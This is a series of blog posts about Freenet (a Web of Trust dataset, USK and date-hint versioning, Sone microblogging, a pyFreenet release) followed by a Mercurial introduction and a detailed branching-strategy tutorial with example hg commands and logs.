I will not investigate all the details here. Instead, the files trust-deduplicated.csv and trust-sone.csv contain anonymized snapshots of the edges in the Web of Trust graph which can be loaded in common graph analysis tools. The first contains all trust values, the second only those which were set by the anonymous social network Sone, which indicates that the user saw at least one message of the other user.

An example of the investigations which can be done with this dataset is the following graph, where I let Gephi split the graph into communities using clustering analysis. The colors indicate the community, while the size of the nodes shows the hub-value and the color of the connections shows the betweenness. This uses the Reingold layout.

[image: the trust graph split into communities]

It’s already visible that there are communities where the trust connection is realized by only a single node which trusts many others, but that there is also a well-connected center.

The identities in the csv files are given by an index in the list of identities instead of using their key to make it easy for researchers to use the data without having to fear that they might de-anonymize someone with correlation analysis or similar. The index-value depends on the identity files downloaded at

This dataset was created using the following scripts:

Simply execute them in order to get the file trust-anonymized.csv

(the most current version is available from notabug via Git, from Bitbucket via Mercurial, and from a static clone via Mercurial)

(to run the scripts, you need Guile 2.0.11 or later installed and Freenet running on port 8888. You might have to run them several times to retrieve rarely accessed identities)

If you use this dataset, for example to investigate social interaction or the effects of anonymity, please drop me a note and reference the Freenet Project and me (Arne Babenhauserheide).

I release the csv files under cc by. If you use my Guile Scheme scripts (with the scm suffix) for research, I hereby grant the additional permission to use them under cc by, too. This should make it easy to comply with releasing your scripts and data as Open Access.

Attachments:
trust-deduplicated-force-atlas-hub-centrality.png (1.37 MB)
trust-sone-reingold.png (953.21 KB)
trust-sone.csv (218.92 KB)
trust-deduplicated.csv (3.58 MB)
crawl-wot.scm (8.64 KB)
parse-crawled.scm (3.35 KB)
anonymize-csv.scm (3.18 KB)
deduplicate-csv.scm (1.35 KB)
trust-anonymized-2020-11-01-under-attack.csv (3.17 MB)
attacking-nodes-2020-11-01.csv (277 Bytes)
2020-11-01-parse-crawled.scm (3.35 KB)
2020-11-01-crawl-wot.scm (9.49 KB)
2020-11-01-deduplicate-csv.scm (1.35 KB)
2020-11-01-anonymize-csv.scm (3.47 KB)
2020-11-01-graph-attackers-red-hubbiness-circle-pack.png (894.42 KB)
2020-11-01-graph-attackers-red-hubbiness-circle-pack.png894.42 KB

USK and Date-Hints: Finding the newest version of a site in Freenet's immutable datastore

Freenet provides a global, anonymous datastore where you can upload sites which then work like normal websites. But different from websites, they have a version-number.

The reason for this is that you can only upload to a given key once1. This data then gets stored in the network and is effectively immutable (much like immutable data structures in functional programming).

In this model conflicts can arise from uploads of different users and from uploads of different versions of the site.

Avoid conflicts between users

So what if Alice uploads the file gpl.txt, and then Mallory tries to upload it again before users get the upload from Alice?

To avoid these conflicts between users, you can upload to an address defined by a key-pair. That key-pair has two keys, a public and a private one. The URL of the site is derived from the public key. Everyone who has this URL can access the site. The private one allows uploading new data to the site. Only the owner of the private key can upload files to the site. This is the SSK: The Signed Subspace Key. It defines a space in Freenet which only you can update.

An SSK looks like this: SSK@[key]/[sitename]/[path/to/file]

Avoid conflicts between versions

But now what if Alice wants to upload a new version of gpl.txt - say GPLv3?

To avoid conflicts between different versions, each new version gets a unique identifier. The reason for using version numbers and not some other identifier is historical: To update sites despite not being able to rewrite published data, freenet users started to version their sites by simply appending a number to the name and then adding small images for future versions. If these images showed up, the new version existed.2

Most sites in freenet had a section like this (the images might take a bit to load - they are downloaded from a freenet outproxy):

[activelink images: technophob-116, technophob-117, technophob-118, technophob-119]

At some point, the freenet developers decided to integrate that function into freenet. They added a new key-type: The Updatable Subspace Key, in short: USK.

A USK looks like this: USK@[key]/[sitename]/[version]/[path/to/file]
(The difference to the SSK is that there is a path-element for the version).

If you enter a USK, freenet automatically checks for newer versions and then shows you the most recent version of the site.

As a practical example:

technophob

Note that this link will automatically get you to version 117 (or whatever version is the current one when you read this article), even though it has version 116 in its URL.

Internally the USK simply gets translated to an SSK in the form of SSK@[key]/[sitename]-[version]/[path/to/file]. You’ll surely recognize the scheme which is used here.
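
As a small sketch of that translation (just the naming scheme described above, not the actual Freenet code):

def usk_to_ssk(usk):
    """Translate USK@[key]/[sitename]/[version]/[path/to/file] into the
    SSK@[key]/[sitename]-[version]/[path/to/file] form described above."""
    assert usk.startswith("USK@")
    key, sitename, version, *path = usk[len("USK@"):].split("/")
    return "/".join(["SSK@" + key, sitename + "-" + version] + path)

# usk_to_ssk("USK@[key]/technophob/117/index.html")
# -> "SSK@[key]/technophob-117/index.html"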

This is a prime example of demand-driven development: Users found a way to make sites dynamic with the activelink-hack. Then the Freenet developers added this as an official feature. As a nice side-effect, the activelink-images stayed with us as part of the Freenet culture: Almost every site in freenet has a small logo with a width and height of 108x36 pixels.

Date-Hints

USKs solved the problem of having updatable sites by checking some versions into the future. But they had a limitation: If your USK-Link was very old, freenet would have to check hundreds or even thousands of URLs to find the newest version. And this would naturally be very, very slow. Due to the distributed nature of Freenet, it is also not possible to just list all files under a given Key. You can only check for directories - the sitenames.

Also files in Freenet only stay available when people access them - but checking whether some file might still be accessible isn’t a well-defined problem: The data for that file could be on the computer of someone who is currently offline. When he or she comes online again, the file could suddenly be available, so determining whether a file does not exist isn’t actually possible.

A timeline of versions could look like this:

2009: 1, 2, 3
2010: 4, 5
2011: 6
2012: 7, 8, 9, 10, 11, 12, 13, 14
2013: 15
2014: 16, 17, 18

Now imagine that you find a link on a site which was added in 2010. It would for example link to version 4 of the site. If you access this site in 2014, freenet has to check versions 5,6,7,8...18 to find the most recent version. That requires 13 downloads - and for normal freesites the versions can be as high as 1200.

But remember that you can upload to arbitrary filenames. So what if the author of the site gave you a hint of the first version in 2014? With that, freenet would only have to start at version 16 - just 3 versions to check, and the hint.

Why the first version? Remember that files cannot be overwritten, so the author cannot keep updating a hint to always point at the most recent version of 2014.

And this is just what the freenet developers did: Date-Hints are simply files in freenet which contain the information about the most recent version of the site at some point in time.

The datehint keys look like this: SSK@[key]/[sitename]-DATEHINT-[year]

The file found at this key is a simple plain text file with content like the following:

HINT
46
2013-7-5

The first line is the identifier, the second is the most recent version at the time of insert (the first version in the year) and the last is the date of the upload of that version.

A yearly date-hint speeds up getting the most recent version a lot. But since sites in freenet have hundreds of versions rather than tens, it is a bit too coarse. It can still leave you with 20 or 30 possible new versions. So it actually provides additional date hints on a monthly, weekly and daily basis:

  • SSK@[key]/[sitename]-DATEHINT-[year]
  • SSK@[key]/[sitename]-DATEHINT-[year]-WEEK-[week]
  • SSK@[key]/[sitename]-DATEHINT-[year]-[month]
  • SSK@[key]/[sitename]-DATEHINT-[year]-[month]-[day]

If you give freenet a USK-link, it starts on the order of 10 requests: 4 date hints with the current date and requests for versions following the version in the link. Normally it gets a result in under 10 seconds.
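
As an illustration, building the four date-hint keys for a date and parsing a hint file could look like this (the exact week-numbering convention is an assumption; Freenet may count weeks differently):

import datetime

def datehint_keys(key, sitename, date=None):
    """Build the yearly, weekly, monthly and daily date-hint keys for a date."""
    if date is None:
        date = datetime.date.today()
    iso_year, iso_week, _ = date.isocalendar()
    base = "SSK@" + key + "/" + sitename + "-DATEHINT-"
    return [base + str(date.year),
            base + "{}-WEEK-{}".format(iso_year, iso_week),
            base + "{}-{}".format(date.year, date.month),
            base + "{}-{}-{}".format(date.year, date.month, date.day)]

def parse_datehint(text):
    """Parse the plain-text hint file: 'HINT', edition, insert date."""
    lines = text.strip().splitlines()
    assert lines[0] == "HINT"
    return int(lines[1]), lines[2]

# parse_datehint("HINT\n46\n2013-7-5") -> (46, '2013-7-5')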

The algorithmic cost should be 4 additional inserts per insert, and at least 4 fetches (current year, month, week, day) followed by N fetches (with N the uploads since the last found DATEHINT) to find the most recent version.

In case of strictly periodical uploads N should be capped at the number of uploads per day, or 7 (days per week) or 4 (weeks per month) or 12 (months per year), so Freenet would need to start at most 16 fetches to get the most recent version of a USK.

Conclusion

With USKs and Date-Hints Freenet implements updatable sites with acceptable performance in its anonymous datastore with effectively immutable data.

If you want to see it for yourself, come to freenetproject.org and install freenet. It’s free software and available for Windows, GNU/Linux and MacOSX.


  1. If you try to upload to a given key twice, you can get collisions. In that case, it isn’t clear which data a client will retrieve - similar to race conditions in threaded programs. That’s why we do not write to the same key twice in practice (though there is a key-type which can be used for passwords or simple file-names. It is called KSK and was the first key-type freenet provided. That led to wars on overwriting files like gpl.txt - similar to the edit-wars we nowadays get on Wikipedia, but with real anonymity thrown in ☺). 

Attachments:
technophob-activelink.png (5.25 KB)
freenet-logo.png (2.26 KB)

What can Freenet do well already?

From the #freenet IRC channel at freenode.net:

toad_1: what can freenet do well already?

  • sharing and retrieving files asynchronously, freemail, IRC2, publishing sites without need of a central server, sharing code repositories

  • I can simply go online, upload a file, send the key to a friend and go offline. the friend can then retrieve the file, even though I am already offline without needing a central server.

  • and nobody can eavesdrop.

  • it might be kinda slow, but it actually makes it easy to publish stuff: via jSite, floghelper and others.

  • floghelper is cool: spam-resistant anonymous blogging without central server

  • and freereader is, too (even though it needs lots of polish): forward RSS feeds into freenet

  • you can actually exchange passwords in a safe way via freemail: anonymous email with an integrated web-interface and imap access.

    • Justus and me coordinated the upload of the social networking site onto my FTP solely over freemail, and I did not have any fear of eavesdropping - different from any other mail I write.

… I think I should store this conversation somewhere

which I hereby did - I hope you enjoyed this little insight into the #freenet channel :)

And if you grew interested, why not install freenet yourself? It only takes a few clicks via webstart and you’re part of the censorship-resistant web.


  1. toad, alias Matthew Toseland, is the main developer of freenet. He tends to see more of the remaining challenges and fewer of the achievements than I do - which is a pretty good trait for someone who builds a system to which we might have to entrust our basic right of free speech if the world goes on like this. From a PR perspective it is a pretty horrible trait, though, because he tends to forget to tell people what freenet can already do well :) 

  2. To set up the social networking features of Freenet, have a look at the social networking guide 

Wrapup: Make Sone scale - fast, anonymous, decentral microblogging over freenet

Sone1 allows fast, identi.ca-style microblogging in Freenet. This is my wrapup of a discussion about the steps to take before Sone can become an integral part of Freenet.

Current state

  • Is close to realtime.

  • Downloads all IDs and all their posts and replies → polling which won’t scale; short term local breakage.

  • Uploads all posts on every update → Can displace lots of content. Effective Size: X*M, X = revisions which did not drop out, M = total number of your messages. Long term self-DDoS of freenet.

Future

  • Is close to realtime for those you follow and your usual discussion group.

  • Uploads only recent posts directly and bundles older posts → much reduced storage need. Effective size: B * Z + Y*M; B = posts per bundle, Z = number of bundles which did not drop out, Y = number of not yet bundled messages; Z << Y, B << X, Y << X.

  • Downloads only the ones you follow + ones you get told about. Telling others means that you need to include info about people you follow, because you only get information from them.

Telling others about replies, options

  • Include all replies to anyone that I see in my own Sone → size rises massively, since you include all replies of all people you follow in your own Sone.

  • Include all IDs from which you saw replies along with the people they replied to → needs to poll more IDs. Optionally forward that info for several hops → for efficient routing it needs knowledge about the full follower topology, which is a privacy risk.

  • Discovering replies from people you don’t know yet: Add a WoT info: replies. Updated only when you reply to someone you did not reply to before. Poll people’s reply lists based on their WoT rating. Keep a list of people who answered one of your posts and poll these more often. Maybe poll people instantly who solve one of your captchas (your general captcha queue) → new users can enter quickly. When you solve captchas in WoT, preferably solve those from people you follow.
    → four ways to discover a reply:

    1. poll those you follow,
    2. poll the people who posted the latest replies to you (your usual discussion-group),
    3. poll those who solve one of your captchas (get new people in as fast as possible) and
    4. poll the replies-info from everyone with the polling frequency based on their WoT rating.

  1. You can find Sone in Freenet using the key USK@nwa8lHa271k2QvJ8aa0Ov7IHAV-DFOCFgmDt3X6BpCI,DuQSUZiI~agF8c-6tjsFFGuZ8eICrzWCILB60nT8KKo,AQACAAE/sone/38/ 

follow the blue rabbit

========= blue-rabbit =========
follow the blue rabbit
through the looking glass
to find your real self
========= looking glass =========

pyFreenet 0.4.1 with auto-spawn support in fcpupload

I just put up a new pyFreenet release (github):

If you have Python3 and pip >= 8 you can get it with pip3 install -U --user --egg pyFreenet3. It provides a cleaned up fcpupload script with --spawn support (requires GNU/Linux):

pip3 install -U --user --egg pyFreenet3
echo 1 > testfile
fcpupload --spawn --fcpPort 9486 testfile 

Add -p 1 (high priority) and -e (realtime) for higher speed.

It creates a Freenet node which listens at port 9486 (unless one already exists there), inserts the testfile, waits until the upload finishes, gives you a CHK link to the file and stops the node afterwards.

Also fcpupload now works again when used with a remote node.

This is tested by doublec, but still has rough edges (for example pip3 install can fail with "error: option --single-version-externally-managed not recognized"). But it works: people who have Java and Python3 installed on GNU/Linux can now upload files into Freenet without having to worry about Freenet at all — even without ever seeing it.

If you experience problems, please tell me on FMS (in Freenet), on GNU social or on Twitter.

This article is also available on my Sharesite in Freenet: random_babcom: pyFreenet 0.4.1 with auto-spawn support in fcpupload

the zen of tolerance

  • You are entitled to voice your opinion.
  • You are not entitled to force it upon everyone.
  • You are not entitled to force it upon a subgroup repeatedly.
  • You are also not entitled to hurl hate towards participants, since that would disrupt communication.
  • If you cannot stay respectful and friendly after being asked to, I will unsee you and advise others to do the same with a clear and brief explanation, so they can take an informed decision.

I will use technical means to realize the zen of tolerance.

Tolerance for intolerance is self-defeating. Continuous disruption of communication is censorship.

Constant outrage disrupts communication. As does constant mocking.

This could also be called the paradox of free speech: your freedom of speech is worth as much as mine. It ends where it impedes mine. And vice versa.

In Freenet, the decentralized FMS forums and the WebOfTrust plugin implement a technical method which can be used to realize this.

First published on random_babcom, my Freenet Sharesite.

“regarding B.S. like SOPA, PIPA, … freenet seems like a good idea after all!”

“Some years ago, I had a look at freenet and wasn't really convinced, now I'm back - a lot has changed, it grew bigger and insanely fast (in freenet terms), like it a lot, maybe this time I'll keep it. Especially regarding B.S. like SOPA, PIPA and other internet-crippling movements, freenet seems like a good idea after all!”
— sparky in Sone

So, if you know freenet and it did not work out for you in the past, it might be time to give it another try: freenetproject.org

This quote just grabbed me, and sparky gave me permission to cite it.

Freenet: WoT, database error, recovery patch

I just had a database error in WoT (the Freenet generic Web of Trust plugin) and couldn’t access one of my identities anymore (plus I didn’t have a backup of its private keys though it told me to keep backups – talk about carelessness :) ).

I asked p0s on IRC and he helped me patch together a WoT which doesn’t access the context for editing the ID (and in turn misses some functionality). This allowed me to regain my ID’s private key and with that redownload my ID from freenet.

I didn’t want that patch rotting on my drive, so I uploaded it here: disable-context-checks-regain-keys.path

Applied to revision 4f84492d277e25618003e0e5a0cb14159a50535d of WoT staging.

Essentially it just comments out some stuff.

Attachment (size):
  • disable-context-checks-regain-keys.path (3.79 KB)

Mercurial

Mercurial is a distributed source control management tool.

Mercurial links:
- Mercurial Website.
- bitbucket.org - Easy repository publishing.
- Hg Init - A very nice Mercurial tutorial for newcomers.

With it you can save snapshots of your work on documents and go back to these at all times.

Also you can easily collaborate with other people and use Mercurial to merge your work.

Someone changes something in a text file you also worked on? No problem. If you didn't work on the same line, you can simply let Mercurial do an automatic merge and your work will be joined. (If you worked on the same line, you'll need to choose how to merge the two changes.)

It doesn't need a network connection for normal operation - only when you want to push your changes over the internet or pull other people's changes from the web - so its commands are fast. The time to do a commit is barely noticeable, which makes atomic commits easy to do.
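
A minimal sketch of that everyday cycle (the URL and file names are just examples, not a real project):

hg clone https://example.org/repo myproject   # get the project once (needs network)
cd myproject
echo "an idea" > idea.txt
hg add idea.txt
hg ci -m "noted an idea"      # snapshot; works completely offline
hg pull                       # fetch the changes of others (needs network)
hg merge                      # join their work with yours (if the pull brought a new head)
hg ci -m "merged their changes"
hg push                       # publish your work (needs network)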

And if you already know subversion, the switch to Mercurial will be mostly painless.

But its most important strength is not its speed. It is that Mercurial just works. No hassle with complicated setup. No arcane commands. Almost everything I ever wanted to do with it just worked out of the box, and that's a rare and precious feature today.

And to answer a common question:

“Once you have learned git well, what use is hg?” — Ross Bartlett in Why Mercurial?

  • Easier usage (with git I shot myself in the foot quite often. Mercurial just works),
  • Thoroughly planned features and user interface,
  • No need to think much about the tool. There is a reason why hg users tend to talk less about hg: There is no need to talk about it that much,
  • Accessing both hg and git repos from one ui via hg-git,
  • Versioned tags and the option to use persistent branches, which make it easier to track later on why a commit was added,
  • And many great extensions which for example enable much better scaling for huge repositories and distributed teams, along with easy paths to evolve.

I wish you much fun with Mercurial!

A complete Mercurial branching strategy

New version: draketo.de/software/mercurial-branching-strategy

This is a complete collaboration model for Mercurial. It shows you all the actions you may need to take, except for the basics already found in other tutorials.

Adaptions optimize the model for special needs like maintaining multiple releases1, grafting micro-releases and an explicit code review stage.

Summary: 3 simple rules

Any model to be used by people should consist of simple, consistent rules. Programming is complex enough without having to worry about elaborate branching directives. Therefore this model boils down to 3 simple rules:

3 simple rules:

(1) you do all the work on default2 - except for hotfixes.

(2) on stable you only do hotfixes, merges for release3 and tagging for release. Only maintainers4 touch stable.

(3) you can use arbitrary feature-branches5, as long as you don’t call them default or stable. They always start at default (since you do all the work on default).

Diagram

To visualize the structure, here’s a 3-tiered diagram. To the left are the actions of programmers (commits and feature branches) and in the center the tasks for maintainers (release and hotfix). The users to the right just use the stable branch.6

Overview Diagram
An overview of the branching strategy. Click the image to get the emacs org-mode ditaa-source.

Practical Actions

Now we can look at all the actions you will ever need to do in this model:7

  • Regular development

    • commit changes: (edit); hg ci -m "message"

    • continue development after a release: hg update; (edit); hg ci -m "message"

  • Feature Branches

    • start a larger feature: hg branch feature-x; (edit); hg ci -m "message"

    • continue with the feature: hg update feature-x; (edit); hg ci -m "message"

    • merge the feature: hg update default; hg merge feature-x; hg ci -m "merged feature x into default"

    • close and merge the feature when you are done: hg update feature-x; hg ci --close-branch -m "finished feature x"; hg update default; hg merge feature-x; hg ci -m "merged finished feature x into default"

  • Tasks for Maintainers

    • Initialize (only needed once)

      • create the repo: hg init reponame; cd reponame

      • first commit: (edit); hg ci -m "message"

      • create the stable branch and do the first release: hg branch stable; hg tag tagname; hg up default; hg merge stable; hg ci -m "merge stable into default: ready for more development"

    • apply a hotfix8: hg up stable; (edit); hg ci -m "message"; hg up default; hg merge stable; hg ci -m "merge stable into default: ready for more development"

    • do a release9: hg up stable; hg merge default; hg ci -m "(description of the main changes since the last release)" ; hg tag tagname; hg up default ; hg merge stable ; hg ci -m "merged stable into default: ready for more development"

That’s it. All that follows is a detailed example which goes through all actions one by one, adaptions to this workflow and the final summary.

Example

This is the output of a complete example run 10 of the branching model, including all complications you should ever hit.

We start with the full history. In the following sections, we will take it apart to see what the commands do. So just take a glance, take in the basic structure and then move on for the details.

hg log -G
@    changeset:   15:855a230f416f
|\   tag:         tip
| |  parent:      13:e7f11bbc756c
| |  parent:      14:79b616e34057
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:49 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   14:79b616e34057
|/|  branch:      stable
| |  parent:      7:e8b509ebeaa9
| |  parent:      13:e7f11bbc756c
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:48 2013 +0100
| |  summary:     merged default into stable for release
| |
o |    changeset:   13:e7f11bbc756c
|\ \   parent:      11:e77a94df3bfe
| | |  parent:      12:aefc8b3a1df2
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:47 2013 +0100
| | |  summary:     merged finished feature x into default
| | |
| o |  changeset:   12:aefc8b3a1df2
| | |  branch:      feature-x
| | |  parent:      9:1dd6209b2a71
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:46 2013 +0100
| | |  summary:     finished feature x
| | |
o | |  changeset:   11:e77a94df3bfe
|\| |  parent:      10:8c423bc00eb6
| | |  parent:      9:1dd6209b2a71
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:45 2013 +0100
| | |  summary:     merged feature x into default
| | |
o | |  changeset:   10:8c423bc00eb6
| | |  parent:      8:dc61c2731eda
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:44 2013 +0100
| | |  summary:     3
| | |
| o |  changeset:   9:1dd6209b2a71
|/ /   branch:      feature-x
| |    user:        Arne Babenhauserheide <bab@draketo.de>
| |    date:        Sat Jan 26 15:39:43 2013 +0100
| |    summary:     x
| |
o |  changeset:   8:dc61c2731eda
|\|  parent:      5:4c57fdadfa26
| |  parent:      7:e8b509ebeaa9
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:43 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   7:e8b509ebeaa9
| |  branch:      stable
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:42 2013 +0100
| |  summary:     Added tag v2 for changeset 089fb0af2801
| |
| o  changeset:   6:089fb0af2801
|/|  branch:      stable
| |  tag:         v2
| |  parent:      4:d987ce9fc7c6
| |  parent:      5:4c57fdadfa26
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:41 2013 +0100
| |  summary:     merge default into stable for release
| |
o |  changeset:   5:4c57fdadfa26
|\|  parent:      3:bc625b0bf090
| |  parent:      4:d987ce9fc7c6
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:40 2013 +0100
| |  summary:     merge stable into default: ready for more development
| |
| o  changeset:   4:d987ce9fc7c6
| |  branch:      stable
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:39 2013 +0100
| |  summary:     hotfix
| |
o |  changeset:   3:bc625b0bf090
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     2
| |
o |  changeset:   2:3e8df435bcb0
|\|  parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   1:a8b7e0472c5b
|/   branch:      stable
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:36 2013 +0100
|    summary:     Added tag v1 for changeset f97ea6e468a1
|
o  changeset:   0:f97ea6e468a1
   tag:         v1
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Sat Jan 26 15:39:36 2013 +0100
   summary:     1

Action by action

Let’s take the log apart to show the actions contributors will do.

Initialize

Initializing and doing the first commit creates the first changeset:

o  changeset:   0:f97ea6e468a1
   tag:         v1
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Sat Jan 26 15:39:36 2013 +0100
   summary:     1

Nothing much to see here.

Commands:

hg init test-branch; cd test-branch
(edit); hg ci -m "message"

Stable branch and first release

We add the first tagging commit on the stable branch as release and merge back into default:

o    changeset:   2:3e8df435bcb0
|\   parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   1:a8b7e0472c5b
|/   branch:      stable
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:36 2013 +0100
|    summary:     Added tag v1 for changeset f97ea6e468a1
|
o  changeset:   0:f97ea6e468a1
   tag:         v1
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Sat Jan 26 15:39:36 2013 +0100
   summary:     1

Mind the tag field which is now shown in changeset 0 and the branchname for changeset 1. This is the only release which will ever be on the default branch (because the stable branch only starts to exist after the first commit on it: The commit which adds the tag).

Commands:

hg branch stable
hg tag tagname
hg up default
hg merge stable
hg ci -m "merged stable into default: ready for more development"`

Further development

Now we just chug along. The one commit shown here could be an arbitrary number of commits.

o    changeset:   3:bc625b0bf090
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:38 2013 +0100
|    summary:     2
|  
o    changeset:   2:3e8df435bcb0
|\   parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development

Commands:

(edit)
hg ci -m "message"

Hotfix

If a hotfix has to be applied to the release out of order, we just update to the stable branch, apply the hotfix and then merge the stable branch into default11. This gives us changesets 4 for the hotfix and 5 for the merge (2 and 3 are shown as reference).

o    changeset:   5:4c57fdadfa26
|\   parent:      3:bc625b0bf090
| |  parent:      4:d987ce9fc7c6
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:40 2013 +0100
| |  summary:     merge stable into default: ready for more development
| |
| o  changeset:   4:d987ce9fc7c6
| |  branch:      stable
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:39 2013 +0100
| |  summary:     hotfix
| |
o |  changeset:   3:bc625b0bf090
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     2
| |
o |  changeset:   2:3e8df435bcb0
|\|  parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development

Commands:

hg up stable
(edit)
hg ci -m "message"
hg up default
hg merge stable
hg ci -m "merge stable into default: ready for more development"    

Regular release

To do a regular release, we just merge the default branch into the stable branch and tag the merge. Then we merge stable back into default. This gives us changesets 6 to 812. The commit-message you use for the merge to stable will become the description for your tag, so you should choose a good description instead of “merge default into stable for release”. User-friendly, simplified release notes would be a good choice.

o    changeset:   8:dc61c2731eda
|\   parent:      5:4c57fdadfa26
| |  parent:      7:e8b509ebeaa9
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:43 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   7:e8b509ebeaa9
| |  branch:      stable
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:42 2013 +0100
| |  summary:     Added tag v2 for changeset 089fb0af2801
| |
| o  changeset:   6:089fb0af2801
|/|  branch:      stable
| |  tag:         v2
| |  parent:      4:d987ce9fc7c6
| |  parent:      5:4c57fdadfa26
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:41 2013 +0100
| |  summary:     merge default into stable for release
| |
o |  changeset:   5:4c57fdadfa26
|\|  parent:      3:bc625b0bf090
| |  parent:      4:d987ce9fc7c6
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:40 2013 +0100
| |  summary:     merge stable into default: ready for more development

Commands:

hg up stable
hg merge default
hg ci -m "merge default into stable for release"
hg tag tagname
hg up default
hg merge stable
hg ci -m "merged stable into default: ready for more development"

Feature branches

Now we want to do some larger development, so we use a feature branch. The one feature-commit shown here (x) could be an arbitrary number of commits, and as long as you stay in your branch, the development of your colleagues will not disturb your own work. Once the feature is finished, we merge it into default. The feature branch gives us changesets 9 to 13 (with 10 being an example for an unrelated intermediate commit on default).

o    changeset:   13:e7f11bbc756c
|\   parent:      11:e77a94df3bfe
| |  parent:      12:aefc8b3a1df2
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:47 2013 +0100
| |  summary:     merged finished feature x into default
| |
| o  changeset:   12:aefc8b3a1df2
| |  branch:      feature-x
| |  parent:      9:1dd6209b2a71
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:46 2013 +0100
| |  summary:     finished feature x
| |
o |  changeset:   11:e77a94df3bfe
|\|  parent:      10:8c423bc00eb6
| |  parent:      9:1dd6209b2a71
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:45 2013 +0100
| |  summary:     merged feature x into default
| |
o |  changeset:   10:8c423bc00eb6
| |  parent:      8:dc61c2731eda
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:44 2013 +0100
| |  summary:     3
| |
| o  changeset:   9:1dd6209b2a71
|/   branch:      feature-x
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:43 2013 +0100
|    summary:     x
|  
o    changeset:   8:dc61c2731eda
|\   parent:      5:4c57fdadfa26
| |  parent:      7:e8b509ebeaa9
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:43 2013 +0100
| |  summary:     merged stable into default: ready for more development

Commands:

  • Start the feature

    hg branch feature-x 
    (edit)
    hg ci -m "message"
    
  • Do an intermediate commit on default

    hg update default
    (edit)
    hg ci -m "message"
    
  • Continue working on the feature

    hg update feature-x
    (edit)
    hg ci -m "message"
    
  • Merge the feature

    hg update default
    hg merge feature-x
    hg ci -m "merged feature x into default"`
    
  • Close and merge a finished feature

    hg update feature-x
    hg ci --close-branch -m "finished feature x"
    hg update default; hg merge feature-x
    hg ci -m "merged finished feature x into default"
    

Note: Closing the feature branch hides that branch in the output of hg branches (except when using --closed) to make the repository state lean and simple, while still keeping the feature branch information in the history. It shows your colleagues that they no longer have to keep the feature in mind as soon as they merge the most recent changes from the default branch into their own feature branches.
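
On the command line this looks like (a minimal sketch):

hg branches            # the closed feature branch no longer shows up here
hg branches --closed   # ...but it is still recorded and can be listed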

Note: To make the final merge of your feature into default easier, you can regularly merge the default branch into the feature branch.
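
For example (a sketch, reusing the feature branch from above):

hg update feature-x
hg merge default
hg ci -m "merged default into feature-x to keep it up to date"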

Note: We use feature branches to ensure that new clones start at a revision which other developers can directly use. With bookmarks you could get trapped on a feature-head which might not be merged to default for quite some time. For more reasons, see the bookmarks footnote.

The final action is to have a maintainer do a regular merge of default into stable to reach a state from which we could safely do a release. Since we already showed how to do that, we are finished here.

Adaptions

This realizes the successful Git branching model13 with Mercurial while maintaining one release at any given time.

